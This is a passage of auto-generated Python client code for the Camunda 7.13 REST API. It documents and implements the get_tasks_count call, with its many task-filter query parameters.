:param str process_variables: Only include tasks that belong to process instances that have variables with certain values. Variable filtering expressions are comma-separated and are structured as follows: A valid parameter value has the form `key_operator_value`. `key` is the variable name, `operator` is the comparison operator to be used and `value` the variable value. **Note**: Values are always treated as String objects on server side. Valid `operator` values are: `eq` - equal to; `neq` - not equal to; `gt` - greater than; `gteq` - greater than or equal to; `lt` - lower than; `lteq` - lower than or equal to; `like`. `key` and `value` may not contain underscore or comma characters.
:param str case_instance_variables: Only include tasks that belong to case instances that have variables with certain values. Variable filtering expressions are comma-separated and are structured as follows: A valid parameter value has the form `key_operator_value`. `key` is the variable name, `operator` is the comparison operator to be used and `value` the variable value. **Note**: Values are always treated as String objects on server side. Valid `operator` values are: `eq` - equal to; `neq` - not equal to; `gt` - greater than; `gteq` - greater than or equal to; `lt` - lower than; `lteq` - lower than or equal to; `like`. `key` and `value` may not contain underscore or comma characters.
:param bool variable_names_ignore_case: Match all variable names in this query case-insensitively. If set, `variableName` and `variablename` are treated as equal.
:param bool variable_values_ignore_case: Match all variable values in this query case-insensitively. If set, `variableValue` and `variablevalue` are treated as equal.
:param str parent_task_id: Restrict the query to all tasks that are subtasks of the given task. Takes a task id.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: CountResultDto
If the method is called asynchronously,
returns the request thread.
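A hedged usage sketch (the group name is a made-up example value):
>>> result = api.get_tasks_count(candidate_group='support', active=True)
>>> result.count  # total matching tasks, assuming CountResultDto exposes a `count` field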
"""
kwargs['_return_http_data_only'] = True
return self.get_tasks_count_with_http_info(**kwargs) # noqa: E501
def get_tasks_count_with_http_info(self, **kwargs): # noqa: E501
"""get_tasks_count # noqa: E501
Retrieves the number of tasks that fulfill a provided filter. Corresponds to the size of the result set when using the [Get Tasks](https://docs.camunda.org/manual/7.13/reference/rest/task/) method. **Security Consideration:** There are several query parameters (such as assigneeExpression) for specifying an EL expression. These are disabled by default to prevent remote code execution. See the section on [security considerations](https://docs.camunda.org/manual/7.13/user-guide/process-engine/securing-custom-code/) for custom code in the user guide for details. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tasks_count_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str process_instance_id: Restrict to tasks that belong to process instances with the given id.
:param str process_instance_id_in: Restrict to tasks that belong to process instances with the given ids.
:param str process_instance_business_key: Restrict to tasks that belong to process instances with the given business key.
:param str process_instance_business_key_expression: Restrict to tasks that belong to process instances with the given business key which is described by an expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str process_instance_business_key_in: Restrict to tasks that belong to process instances with one of the given business keys. The keys need to be in a comma-separated list.
:param str process_instance_business_key_like: Restrict to tasks that have a process instance business key that has the parameter value as a substring.
:param str process_instance_business_key_like_expression: Restrict to tasks that have a process instance business key that has the parameter value as a substring and is described by an expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str process_definition_id: Restrict to tasks that belong to a process definition with the given id.
:param str process_definition_key: Restrict to tasks that belong to a process definition with the given key.
:param str process_definition_key_in: Restrict to tasks that belong to a process definition with one of the given keys. The keys need to be in a comma-separated list.
:param str process_definition_name: Restrict to tasks that belong to a process definition with the given name.
:param str process_definition_name_like: Restrict to tasks that have a process definition name that has the parameter value as a substring.
:param str execution_id: Restrict to tasks that belong to an execution with the given id.
:param str case_instance_id: Restrict to tasks that belong to case instances with the given id.
:param str case_instance_business_key: Restrict to tasks that belong to case instances with the given business key.
:param str case_instance_business_key_like: Restrict to tasks that have a case instance business key that has the parameter value as a substring.
:param str case_definition_id: Restrict to tasks that belong to a case definition with the given id.
:param str case_definition_key: Restrict to tasks that belong to a case definition with the given key.
:param str case_definition_name: Restrict to tasks that belong to a case definition with the given name.
:param str case_definition_name_like: Restrict to tasks that have a case definition name that has the parameter value as a substring.
:param str case_execution_id: Restrict to tasks that belong to a case execution with the given id.
:param str activity_instance_id_in: Only include tasks which belong to one of the passed and comma-separated activity instance ids.
:param str tenant_id_in: Only include tasks which belong to one of the passed and comma-separated tenant ids.
:param bool without_tenant_id: Only include tasks which belong to no tenant. Value may only be `true`, as `false` is the default behavior.
:param str assignee: Restrict to tasks that the given user is assigned to.
:param str assignee_expression: Restrict to tasks that the user described by the given expression is assigned to. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str assignee_like: Restrict to tasks that have an assignee that has the parameter value as a substring.
:param str assignee_like_expression: Restrict to tasks that have an assignee that has the parameter value described by the given expression as a substring. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str assignee_in: Only include tasks which are assigned to one of the passed and comma-separated user ids.
:param str owner: Restrict to tasks that the given user owns.
:param str owner_expression: Restrict to tasks that the user described by the given expression owns. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str candidate_group: Only include tasks that are offered to the given group.
:param str candidate_group_expression: Only include tasks that are offered to the group described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str candidate_user: Only include tasks that are offered to the given user or to one of the user's groups.
:param str candidate_user_expression: Only include tasks that are offered to the user described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param bool include_assigned_tasks: Also include tasks that are assigned to users in candidate queries. By default, a query by candidate user or group(s) only includes tasks that are not assigned to any user.
:param str involved_user: Only include tasks that the given user is involved in. A user is involved in a task if an identity link exists between the task and the user (e.g., the user is the assignee).
:param str involved_user_expression: Only include tasks that the user described by the given expression is involved in. A user is involved in a task if an identity link exists between the task and the user (e.g., the user is the assignee). See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param bool assigned: If set to `true`, restricts the query to all tasks that are assigned.
:param bool unassigned: If set to `true`, restricts the query to all tasks that are unassigned.
:param str task_definition_key: Restrict to tasks that have the given key.
:param str task_definition_key_in: Restrict to tasks that have one of the given keys. The keys need to be in a comma-separated list.
:param str task_definition_key_like: Restrict to tasks that have a key that has the parameter value as a substring.
:param str name: Restrict to tasks that have the given name.
:param str name_not_equal: Restrict to tasks that do not have the given name.
:param str name_like: Restrict to tasks that have a name with the given parameter value as substring.
:param str name_not_like: Restrict to tasks that do not have a name with the given parameter value as substring.
:param str description: Restrict to tasks that have the given description.
:param str description_like: Restrict to tasks that have a description that has the parameter value as a substring.
:param int priority: Restrict to tasks that have the given priority.
:param int max_priority: Restrict to tasks that have a priority lower than or equal to the given value.
:param int min_priority: Restrict to tasks that have a priority higher than or equal to the given value.
:param str due_date: Restrict to tasks that are due on the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.546+0200`.
:param str due_date_expression: Restrict to tasks that are due on the date described by the given expression. See the [User Guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str due_after: Restrict to tasks that are due after the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.435+0200`.
:param str due_after_expression: Restrict to tasks that are due after the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str due_before: Restrict to tasks that are due before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.243+0200`.
:param str due_before_expression: Restrict to tasks that are due before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_date: Restrict to tasks that have a followUp date on the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.342+0200`.
:param str follow_up_date_expression: Restrict to tasks that have a followUp date on the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_after: Restrict to tasks that have a followUp date after the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.542+0200`.
:param str follow_up_after_expression: Restrict to tasks that have a followUp date after the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_before: Restrict to tasks that have a followUp date before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.234+0200`.
:param str follow_up_before_expression: Restrict to tasks that have a followUp date before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_before_or_not_existent: Restrict to tasks that have no followUp date or a followUp date before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.432+0200`. The typical use case is to query all `active` tasks for a user for a given date.
:param str follow_up_before_or_not_existent_expression: Restrict to tasks that have no followUp date or a followUp date before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str created_on: Restrict to tasks that were created on the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.324+0200`.
:param str created_on_expression: Restrict to tasks that were created on the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str created_after: Restrict to tasks that were created after the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.342+0200`.
:param str created_after_expression: Restrict to tasks that were created after the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str created_before: Restrict to tasks that were created before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.332+0200`.
:param str created_before_expression: Restrict to tasks that were created before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str delegation_state: Restrict to tasks that are in the given delegation state. Valid values are `PENDING` and `RESOLVED`.
:param str candidate_groups: Restrict to tasks that are offered to any of the given candidate groups. Takes a comma-separated list of group names, so for example `developers,support,sales`.
:param str candidate_groups_expression: Restrict to tasks that are offered to any of the candidate groups described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to `java.util.List` of Strings.
:param bool with_candidate_groups: Only include tasks which have a candidate group. Value may only be `true`, as `false` is the default behavior.
:param bool without_candidate_groups: Only include tasks which have no candidate group. Value may only be `true`, as `false` is the default behavior.
:param bool with_candidate_users: Only include tasks which have a candidate user. Value may only be `true`, as `false` is the default behavior.
:param bool without_candidate_users: Only include tasks which have no candidate users. Value may only be `true`, as `false` is the default behavior.
:param bool active: Only include active tasks. Value may only be `true`, as `false` is the default behavior.
:param bool suspended: Only include suspended tasks. Value may only be `true`, as `false` is the default behavior.
:param str task_variables: Only include tasks that have variables with certain values. Variable filtering expressions are comma-separated and have the form `key_operator_value`, where `key` is the variable name, `operator` is the comparison operator to be used, and `value` is the variable value. **Note**: Values are always treated as String objects on the server side. Valid `operator` values are: `eq` - equal to; `neq` - not equal to; `gt` - greater than; `gteq` - greater than or equal to; `lt` - lower than; `lteq` - lower than or equal to; `like` - like (SQL LIKE-style matching). `key` and `value` may not contain underscore or comma characters.
:param str process_variables: Only include tasks that belong to process instances that have variables with certain values. Variable filtering expressions are comma-separated and have the form `key_operator_value`, where `key` is the variable name, `operator` is the comparison operator to be used, and `value` is the variable value. **Note**: Values are always treated as String objects on the server side. Valid `operator` values are: `eq` - equal to; `neq` - not equal to; `gt` - greater than; `gteq` - greater than or equal to; `lt` - lower than; `lteq` - lower than or equal to; `like` - like (SQL LIKE-style matching). `key` and `value` may not contain underscore or comma characters.
:param str case_instance_variables: Only include tasks that belong to case instances that have variables with certain values. Variable filtering expressions are comma-separated and have the form `key_operator_value`, where `key` is the variable name, `operator` is the comparison operator to be used, and `value` is the variable value. **Note**: Values are always treated as String objects on the server side. Valid `operator` values are: `eq` - equal to; `neq` - not equal to; `gt` - greater than; `gteq` - greater than or equal to; `lt` - lower than; `lteq` - lower than or equal to; `like` - like (SQL LIKE-style matching). `key` and `value` may not contain underscore or comma characters.
:param bool variable_names_ignore_case: Match all variable names in this query case-insensitively. If set, `variableName` and `variablename` are treated as equal.
:param bool variable_values_ignore_case: Match all variable values in this query case-insensitively. If set, `variableValue` and `variablevalue` are treated as equal.
:param str parent_task_id: Restrict query to all tasks that are subtasks of the given task. Takes a task id.
:param _return_http_data_only: response data without HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a
single number is provided, it will be the
total request timeout. It can also be a pair
(tuple) of (connection, read) timeouts.
:return: tuple(CountResultDto, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'process_instance_id',
'process_instance_id_in',
'process_instance_business_key',
'process_instance_business_key_expression',
'process_instance_business_key_in',
'process_instance_business_key_like',
'process_instance_business_key_like_expression',
'process_definition_id',
'process_definition_key',
'process_definition_key_in',
'process_definition_name',
'process_definition_name_like',
'execution_id',
'case_instance_id',
'case_instance_business_key',
'case_instance_business_key_like',
'case_definition_id',
'case_definition_key',
'case_definition_name',
'case_definition_name_like',
'case_execution_id',
'activity_instance_id_in',
'tenant_id_in',
'without_tenant_id',
'assignee',
'assignee_expression',
'assignee_like',
'assignee_like_expression',
'assignee_in',
'owner',
'owner_expression',
'candidate_group',
'candidate_group_expression',
'candidate_user',
'candidate_user_expression',
'include_assigned_tasks',
'involved_user',
'involved_user_expression',
'assigned',
'unassigned',
'task_definition_key',
'task_definition_key_in',
'task_definition_key_like',
'name',
'name_not_equal',
'name_like',
'name_not_like',
'description',
'description_like',
'priority',
'max_priority',
'min_priority',
'due_date',
'due_date_expression',
'due_after',
'due_after_expression',
'due_before',
'due_before_expression',
'follow_up_date',
'follow_up_date_expression',
'follow_up_after',
'follow_up_after_expression',
'follow_up_before',
'follow_up_before_expression',
'follow_up_before_or_not_existent',
'follow_up_before_or_not_existent_expression',
'created_on',
'created_on_expression',
'created_after',
'created_after_expression',
'created_before',
'created_before_expression',
'delegation_state',
'candidate_groups',
'candidate_groups_expression',
'with_candidate_groups',
'without_candidate_groups',
'with_candidate_users',
'without_candidate_users',
'active',
'suspended',
'task_variables',
'process_variables',
'case_instance_variables',
'variable_names_ignore_case',
'variable_values_ignore_case',
'parent_task_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_tasks_count" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'process_instance_id' in local_var_params and local_var_params['process_instance_id'] is not None: # noqa: E501
query_params.append(('processInstanceId', local_var_params['process_instance_id'])) # noqa: E501
if 'process_instance_id_in' in local_var_params and local_var_params['process_instance_id_in'] is not None: # noqa: E501
query_params.append(('processInstanceIdIn', local_var_params['process_instance_id_in'])) # noqa: E501
if 'process_instance_business_key' in local_var_params and local_var_params['process_instance_business_key'] is not None: # noqa: E501
query_params.append(('processInstanceBusinessKey', local_var_params['process_instance_business_key'])) # noqa: E501
if 'process_instance_business_key_expression' in local_var_params and local_var_params['process_instance_business_key_expression'] is not None: # noqa: E501
query_params.append(('processInstanceBusinessKeyExpression', local_var_params['process_instance_business_key_expression'])) # noqa: E501
if 'process_instance_business_key_in' in local_var_params and local_var_params['process_instance_business_key_in'] is not None: # noqa: E501
query_params.append(('processInstanceBusinessKeyIn', local_var_params['process_instance_business_key_in'])) # noqa: E501
if 'process_instance_business_key_like' in local_var_params and local_var_params['process_instance_business_key_like'] is not None: # noqa: E501
query_params.append(('processInstanceBusinessKeyLike', local_var_params['process_instance_business_key_like'])) # noqa: E501
if 'process_instance_business_key_like_expression' in local_var_params and local_var_params['process_instance_business_key_like_expression'] is not None: # noqa: E501
query_params.append(('processInstanceBusinessKeyLikeExpression', local_var_params['process_instance_business_key_like_expression'])) # noqa: E501
if 'process_definition_id' in local_var_params and local_var_params['process_definition_id'] is not None: # noqa: E501
query_params.append(('processDefinitionId', local_var_params['process_definition_id'])) # noqa: E501
if 'process_definition_key' in local_var_params and local_var_params['process_definition_key'] is not None: # noqa: E501
query_params.append(('processDefinitionKey', local_var_params['process_definition_key'])) # noqa: E501
if 'process_definition_key_in' in local_var_params and local_var_params['process_definition_key_in'] is not None: # noqa: E501
query_params.append(('processDefinitionKeyIn', local_var_params['process_definition_key_in'])) # noqa: E501
if 'process_definition_name' in local_var_params and local_var_params['process_definition_name'] is not None: # noqa: E501
query_params.append(('processDefinitionName', local_var_params['process_definition_name'])) # noqa: E501
if 'process_definition_name_like' in local_var_params and local_var_params['process_definition_name_like'] is not None: # noqa: E501
query_params.append(('processDefinitionNameLike', local_var_params['process_definition_name_like'])) # noqa: E501
if 'execution_id' in local_var_params and local_var_params['execution_id'] is not None: # noqa: E501
query_params.append(('executionId', local_var_params['execution_id'])) # noqa: E501
if 'case_instance_id' in local_var_params and local_var_params['case_instance_id'] is not None: # noqa: E501
query_params.append(('caseInstanceId', local_var_params['case_instance_id'])) # noqa: E501
if 'case_instance_business_key' in local_var_params and local_var_params['case_instance_business_key'] is not None: # noqa: E501
query_params.append(('caseInstanceBusinessKey', local_var_params['case_instance_business_key'])) # noqa: E501
if 'case_instance_business_key_like' in local_var_params and local_var_params['case_instance_business_key_like'] is not None: # noqa: E501
query_params.append(('caseInstanceBusinessKeyLike', local_var_params['case_instance_business_key_like'])) # noqa: E501
if 'case_definition_id' in local_var_params and local_var_params['case_definition_id'] is not None: # noqa: E501
query_params.append(('caseDefinitionId', local_var_params['case_definition_id'])) # noqa: E501
if 'case_definition_key' in local_var_params and local_var_params['case_definition_key'] is not None: # noqa: E501
query_params.append(('caseDefinitionKey', local_var_params['case_definition_key'])) # noqa: E501
if 'case_definition_name' in local_var_params and local_var_params['case_definition_name'] is not None: # noqa: E501
query_params.append(('caseDefinitionName', local_var_params['case_definition_name'])) # noqa: E501
if 'case_definition_name_like' in local_var_params and local_var_params['case_definition_name_like'] is not None: # noqa: E501
query_params.append(('caseDefinitionNameLike', local_var_params['case_definition_name_like'])) # noqa: E501
if 'case_execution_id' in local_var_params and local_var_params['case_execution_id'] is not None: # noqa: E501
query_params.append(('caseExecutionId', local_var_params['case_execution_id'])) # noqa: E501
if 'activity_instance_id_in' in local_var_params and local_var_params['activity_instance_id_in'] is not None: # noqa: E501
query_params.append(('activityInstanceIdIn', local_var_params['activity_instance_id_in'])) # noqa: E501
if 'tenant_id_in' in local_var_params and local_var_params['tenant_id_in'] is not None: # noqa: E501
query_params.append(('tenantIdIn', local_var_params['tenant_id_in'])) # noqa: E501
if 'without_tenant_id' in local_var_params and local_var_params['without_tenant_id'] is not None: # noqa: E501
query_params.append(('withoutTenantId', local_var_params['without_tenant_id'])) # noqa: E501
if 'assignee' in local_var_params and local_var_params['assignee'] is not None: # noqa: E501
query_params.append(('assignee', local_var_params['assignee'])) # noqa: E501
if 'assignee_expression' in local_var_params and local_var_params['assignee_expression'] is not None: # noqa: E501
query_params.append(('assigneeExpression', local_var_params['assignee_expression'])) # noqa: E501
if 'assignee_like' in local_var_params and local_var_params['assignee_like'] is not None: # noqa: E501
query_params.append(('assigneeLike', local_var_params['assignee_like'])) # noqa: E501
if 'assignee_like_expression' in local_var_params and local_var_params['assignee_like_expression'] is not None: # noqa: E501
query_params.append(('assigneeLikeExpression', local_var_params['assignee_like_expression'])) # noqa: E501
if 'assignee_in' in local_var_params and local_var_params['assignee_in'] is not None: # noqa: E501
query_params.append(('assigneeIn', local_var_params['assignee_in'])) # noqa: E501
if 'owner' in local_var_params and local_var_params['owner'] is not None: # noqa: E501
query_params.append(('owner', local_var_params['owner'])) # noqa: E501
if 'owner_expression' in local_var_params and local_var_params['owner_expression'] is not None: # noqa: E501
query_params.append(('ownerExpression', local_var_params['owner_expression'])) # noqa: E501
if 'candidate_group' in local_var_params and local_var_params['candidate_group'] is not None: # noqa: E501
query_params.append(('candidateGroup', local_var_params['candidate_group'])) # noqa: E501
if 'candidate_group_expression' in local_var_params and local_var_params['candidate_group_expression'] is not None: # noqa: E501
query_params.append(('candidateGroupExpression', local_var_params['candidate_group_expression'])) # noqa: E501
if 'candidate_user' in local_var_params and local_var_params['candidate_user'] is not None: # noqa: E501
query_params.append(('candidateUser', local_var_params['candidate_user'])) # noqa: E501
if 'candidate_user_expression' in local_var_params and local_var_params['candidate_user_expression'] is not None: # noqa: E501
query_params.append(('candidateUserExpression', local_var_params['candidate_user_expression'])) # noqa: E501
if 'include_assigned_tasks' in local_var_params and local_var_params['include_assigned_tasks'] is not None: # noqa: E501
query_params.append(('includeAssignedTasks', local_var_params['include_assigned_tasks'])) # noqa: E501
if 'involved_user' in local_var_params and local_var_params['involved_user'] is not None: # noqa: E501
query_params.append(('involvedUser', local_var_params['involved_user'])) # noqa: E501
if 'involved_user_expression' in local_var_params and local_var_params['involved_user_expression'] is not None: # noqa: E501
query_params.append(('involvedUserExpression', local_var_params['involved_user_expression'])) # noqa: E501
if 'assigned' in local_var_params and local_var_params['assigned'] is not None: # noqa: E501
query_params.append(('assigned', local_var_params['assigned'])) # noqa: E501
if 'unassigned' in local_var_params and local_var_params['unassigned'] is not None: # noqa: E501
query_params.append(('unassigned', local_var_params['unassigned'])) # noqa: E501
if 'task_definition_key' in local_var_params and local_var_params['task_definition_key'] is not None: # noqa: E501
query_params.append(('taskDefinitionKey', local_var_params['task_definition_key'])) # noqa: E501
if 'task_definition_key_in' in local_var_params and local_var_params['task_definition_key_in'] is not None: # noqa: E501
query_params.append(('taskDefinitionKeyIn', local_var_params['task_definition_key_in'])) # noqa: E501
if 'task_definition_key_like' in local_var_params and local_var_params['task_definition_key_like'] is not None: # noqa: E501
query_params.append(('taskDefinitionKeyLike', local_var_params['task_definition_key_like'])) # noqa: E501
if 'name' in local_var_params and local_var_params['name'] is not None: # noqa: E501
query_params.append(('name', local_var_params['name'])) # noqa: E501
if 'name_not_equal' in local_var_params and local_var_params['name_not_equal'] is not None: # noqa: E501
query_params.append(('nameNotEqual', local_var_params['name_not_equal'])) # noqa: E501
if 'name_like' in local_var_params and local_var_params['name_like'] is not None: # noqa: E501
query_params.append(('nameLike', local_var_params['name_like'])) # noqa: E501
if 'name_not_like' in local_var_params and local_var_params['name_not_like'] is not None: # noqa: E501
query_params.append(('nameNotLike', local_var_params['name_not_like'])) # noqa: E501
if 'description' in local_var_params and local_var_params['description'] is not None: # noqa: E501
query_params.append(('description', local_var_params['description'])) # noqa: E501
if 'description_like' in local_var_params and local_var_params['description_like'] is not None: # noqa: E501
query_params.append(('descriptionLike', local_var_params['description_like'])) # noqa: E501
if 'priority' in local_var_params and local_var_params['priority'] is not None: # noqa: E501
query_params.append(('priority', local_var_params['priority'])) # noqa: E501
if 'max_priority' in local_var_params and local_var_params['max_priority'] is not None: # noqa: E501
query_params.append(('maxPriority', local_var_params['max_priority'])) # noqa: E501
if 'min_priority' in local_var_params and local_var_params['min_priority'] is not None: # noqa: E501
query_params.append(('minPriority', local_var_params['min_priority'])) # noqa: E501
if 'due_date' in local_var_params and local_var_params['due_date'] is not None: # noqa: E501
query_params.append(('dueDate', local_var_params['due_date'])) # noqa: E501
if 'due_date_expression' in local_var_params and local_var_params['due_date_expression'] is not None: # noqa: E501
query_params.append(('dueDateExpression', local_var_params['due_date_expression'])) # noqa: E501
if 'due_after' in local_var_params and local_var_params['due_after'] is not None: # noqa: E501
query_params.append(('dueAfter', local_var_params['due_after'])) # noqa: E501
if 'due_after_expression' in local_var_params and local_var_params['due_after_expression'] is not None: # noqa: E501
query_params.append(('dueAfterExpression', local_var_params['due_after_expression'])) # noqa: E501
if 'due_before' in local_var_params and local_var_params['due_before'] is not None: # noqa: E501
query_params.append(('dueBefore', local_var_params['due_before'])) # noqa: E501
if 'due_before_expression' in local_var_params and local_var_params['due_before_expression'] is not None: # noqa: E501
query_params.append(('dueBeforeExpression', local_var_params['due_before_expression'])) # noqa: E501
if 'follow_up_date' in local_var_params and local_var_params['follow_up_date'] is not None: # noqa: E501
query_params.append(('followUpDate', local_var_params['follow_up_date'])) # noqa: E501
if 'follow_up_date_expression' in local_var_params and local_var_params['follow_up_date_expression'] is not None: # noqa: E501
query_params.append(('followUpDateExpression', local_var_params['follow_up_date_expression'])) # noqa: E501
if 'follow_up_after' in local_var_params and local_var_params['follow_up_after'] is not None: # noqa: E501
query_params.append(('followUpAfter', local_var_params['follow_up_after'])) # noqa: E501
if 'follow_up_after_expression' in local_var_params and local_var_params['follow_up_after_expression'] is not None: # noqa: E501
query_params.append(('followUpAfterExpression', local_var_params['follow_up_after_expression'])) # noqa: E501
if 'follow_up_before' in local_var_params and local_var_params['follow_up_before'] is not None: # noqa: E501
query_params.append(('followUpBefore', local_var_params['follow_up_before'])) # noqa: E501
if 'follow_up_before_expression' in local_var_params and local_var_params['follow_up_before_expression'] is not None: # noqa: E501
query_params.append(('followUpBeforeExpression', local_var_params['follow_up_before_expression'])) # noqa: E501
if 'follow_up_before_or_not_existent' in local_var_params and local_var_params['follow_up_before_or_not_existent'] is not None: # noqa: E501
query_params.append(('followUpBeforeOrNotExistent', local_var_params['follow_up_before_or_not_existent'])) # noqa: E501
if 'follow_up_before_or_not_existent_expression' in local_var_params and local_var_params['follow_up_before_or_not_existent_expression'] is not None: # noqa: E501
query_params.append(('followUpBeforeOrNotExistentExpression', local_var_params['follow_up_before_or_not_existent_expression'])) # noqa: E501
if 'created_on' in local_var_params and local_var_params['created_on'] is not None: # noqa: E501
query_params.append(('createdOn', local_var_params['created_on'])) # noqa: E501
if 'created_on_expression' in local_var_params and local_var_params['created_on_expression'] is not None: # noqa: E501
query_params.append(('createdOnExpression', local_var_params['created_on_expression'])) # noqa: E501
if 'created_after' in local_var_params and local_var_params['created_after'] is not None: # noqa: E501
query_params.append(('createdAfter', local_var_params['created_after'])) # noqa: E501
if 'created_after_expression' in local_var_params and local_var_params['created_after_expression'] is not None: # noqa: E501
query_params.append(('createdAfterExpression', local_var_params['created_after_expression'])) # noqa: E501
if 'created_before' in local_var_params and local_var_params['created_before'] is not None: # noqa: E501
query_params.append(('createdBefore', local_var_params['created_before'])) # noqa: E501
if 'created_before_expression' in local_var_params and local_var_params['created_before_expression'] is not None: # noqa: E501
query_params.append(('createdBeforeExpression', local_var_params['created_before_expression'])) # noqa: E501
if 'delegation_state' in local_var_params and local_var_params['delegation_state'] is not None: # noqa: E501
query_params.append(('delegationState', local_var_params['delegation_state'])) # noqa: E501
if 'candidate_groups' in local_var_params and local_var_params['candidate_groups'] is not None: # noqa: E501
query_params.append(('candidateGroups', local_var_params['candidate_groups'])) # noqa: E501
if 'candidate_groups_expression' in local_var_params and local_var_params['candidate_groups_expression'] is not None: # noqa: E501
query_params.append(('candidateGroupsExpression', local_var_params['candidate_groups_expression'])) # noqa: E501
if 'with_candidate_groups' in local_var_params and local_var_params['with_candidate_groups'] is not None: # noqa: E501
query_params.append(('withCandidateGroups', local_var_params['with_candidate_groups'])) # noqa: E501
if 'without_candidate_groups' in local_var_params and local_var_params['without_candidate_groups'] is not None: # noqa: E501
query_params.append(('withoutCandidateGroups', local_var_params['without_candidate_groups'])) # noqa: E501
